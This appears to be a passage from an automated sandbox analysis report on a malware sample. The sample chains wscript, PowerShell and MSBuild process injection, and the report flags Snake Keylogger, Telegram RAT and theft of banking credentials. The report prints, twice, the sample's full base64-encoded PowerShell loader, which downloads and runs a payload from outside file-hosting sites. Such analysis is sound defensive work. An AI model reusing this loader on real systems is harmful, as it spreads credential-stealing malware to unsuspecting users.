                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595183Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594856Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594747Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594530Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594087Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593869Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593733Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592776Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592106Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591889Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591562Jump to behavior
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                  Source: powershell.exe, 00000002.00000002.1458885432.000001F5E30B2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2551193762.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_6140.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1137008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAAJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[system.text.encoding]::unicode.getstring([convert]::frombase64string('jabhagqaagbvahuacgbuag0azqbuahqaiaa9acaajwawac8abqbtafkawabsahkawabrac8azaavaguazqauaguadabzageacaavac8aogbzahaadab0aggajwa7acqacablag4adabhagqaaqbjacaapqagacqayqbkagoabwb1ahiabgbtaguabgb0acaalqbyaguacabsageaywblacaajwajaccalaagaccadaanadsajabmageacgbhagqaaqb6aguaiaa9acaajwboahqadabwahmaogavac8amwawadaanqauagyaaqbsaguabqbhagkabaauagmabwbtac8ayqbwagkalwbmagkabablac8azwblahqapwbmagkabablagsazqb5ad0abgbjahgaxwa1afqamabmahgasabpaeiaagbpagwatgbiadkaqwbsahyaaqbhagiauabqahiavwayagqababdac0atab4aguatwbkaeoauabgaf8awgbfadeatqbqadyaqwb1afeaqgbtaduaswbjahaadabbacyacabraf8adgbpagqapqazadqamga4adaamwbkadeaywbjadqazqazagiaoaawadeanwazadkamwa1adkamgawadmayga1agyazqa5agqajwa7acqazqbvagwaaqbhag4aiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaa7acqaywbhahiabwb0agkaywagad0aiaakaguabwbsagkayqbuac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakagyayqbyageazabpahoazqapadsajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakagmayqbyag8adabpagmakqa7acqababhahuabgbkaguacgblahiaiaa9acaajwa8adwaqgbbafmarqa2adqaxwbtafqaqqbsafqapga+accaowakahmazqbtagkacaboahkababsagkazabpageabgagad0aiaanadwapabcaeeauwbfadyanabfaeuatgbead4apganadsajabjag8abgbmaguaywb0agkabwbuaguacgbzacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabsageadqbuagqazqbyaguacgapadsajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabzaguabqbpahaaaab5agwababpagqaaqbhag4akqa7acqaywbvag4azgblagmadabpag8abgblahiacwagac0azwblacaamaagac0ayqbuagqaiaakagyacgbhagmadabpag8abgbhahqaaqbuagcaiaatagcadaagacqaywbvag4azgblagmadabpag8abgblahiacwa7acqaywbvag4azgblagmadabpag8abgblahiacwagacsapqagacqababhahuabgbkaguacgblahialgbmaguabgbnahqaaaa7acqacwboaguazqbyagwazqbzahmaiaa9acaajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaalqagacqaywbvag4azgblagmadabpag8abgblahiacwa7acqazwbuageacgbsagkazqbzahqaiaa9acaajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaauafmadqbiahmadabyagkabgbnacgajabjag8abgbmaguaywb0agkabwbuaguacgbzacwaiaakahmaaablaguacgbsaguacwbzackaowakahaaaqbsahaadqbsagkacwb0agkaywagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabnag4ayqbyagwaaqblahmadaapadsajabsag8aywb1ahmadabpagqaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqacabpagwacab1agwaaqbzahqaaqbjackaowakafyazqbsahuadwbzacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawblacgajabuahuababsacwaiabbag8aygbqaguaywb0afsaxqbdacaaqaaoacqacablag4adabhagqaaqbjacwajwanacwajwanacwajwanacwajwbnafmaqgb1agkababkaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccakqapaa
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[system.text.encoding]::unicode.getstring([convert]::frombase64string('jabhagqaagbvahuacgbuag0azqbuahqaiaa9acaajwawac8abqbtafkawabsahkawabrac8azaavaguazqauaguadabzageacaavac8aogbzahaadab0aggajwa7acqacablag4adabhagqaaqbjacaapqagacqayqbkagoabwb1ahiabgbtaguabgb0acaalqbyaguacabsageaywblacaajwajaccalaagaccadaanadsajabmageacgbhagqaaqb6aguaiaa9acaajwboahqadabwahmaogavac8amwawadaanqauagyaaqbsaguabqbhagkabaauagmabwbtac8ayqbwagkalwbmagkabablac8azwblahqapwbmagkabablagsazqb5ad0abgbjahgaxwa1afqamabmahgasabpaeiaagbpagwatgbiadkaqwbsahyaaqbhagiauabqahiavwayagqababdac0atab4aguatwbkaeoauabgaf8awgbfadeatqbqadyaqwb1afeaqgbtaduaswbjahaadabbacyacabraf8adgbpagqapqazadqamga4adaamwbkadeaywbjadqazqazagiaoaawadeanwazadkamwa1adkamgawadmayga1agyazqa5agqajwa7acqazqbvagwaaqbhag4aiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaa7acqaywbhahiabwb0agkaywagad0aiaakaguabwbsagkayqbuac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakagyayqbyageazabpahoazqapadsajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakagmayqbyag8adabpagmakqa7acqababhahuabgbkaguacgblahiaiaa9acaajwa8adwaqgbbafmarqa2adqaxwbtafqaqqbsafqapga+accaowakahmazqbtagkacaboahkababsagkazabpageabgagad0aiaanadwapabcaeeauwbfadyanabfaeuatgbead4apganadsajabjag8abgbmaguaywb0agkabwbuaguacgbzacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabsageadqbuagqazqbyaguacgapadsajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabzaguabqbpahaaaab5agwababpagqaaqbhag4akqa7acqaywbvag4azgblagmadabpag8abgblahiacwagac0azwblacaamaagac0ayqbuagqaiaakagyacgbhagmadabpag8abgbhahqaaqbuagcaiaatagcadaagacqaywbvag4azgblagmadabpag8abgblahiacwa7acqaywbvag4azgblagmadabpag8abgblahiacwagacsapqagacqababhahuabgbkaguacgblahialgbmaguabgbnahqaaaa7acqacwboaguazqbyagwazqbzahmaiaa9acaajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaalqagacqaywbvag4azgblagmadabpag8abgblahiacwa7acqazwbuageacgbsagkazqbzahqaiaa9acaajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaauafmadqbiahmadabyagkabgbnacgajabjag8abgbmaguaywb0agkabwbuaguacgbzacwaiaakahmaaablaguacgbsaguacwbzackaowakahaaaqbsahaadqbsagkacwb0agkaywagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabnag4ayqbyagwaaqblahmadaapadsajabsag8aywb1ahmadabpagqaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqacabpagwacab1agwaaqbzahqaaqbjackaowakafyazqbsahuadwbzacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawblacgajabuahuababsacwaiabbag8aygbqaguaywb0afsaxqbdacaaqaaoacqacablag4adabhagqaaqbjacwajwanacwajwanacwajwanacwajwbnafmaqgb1agkababkaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccakqapaaJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
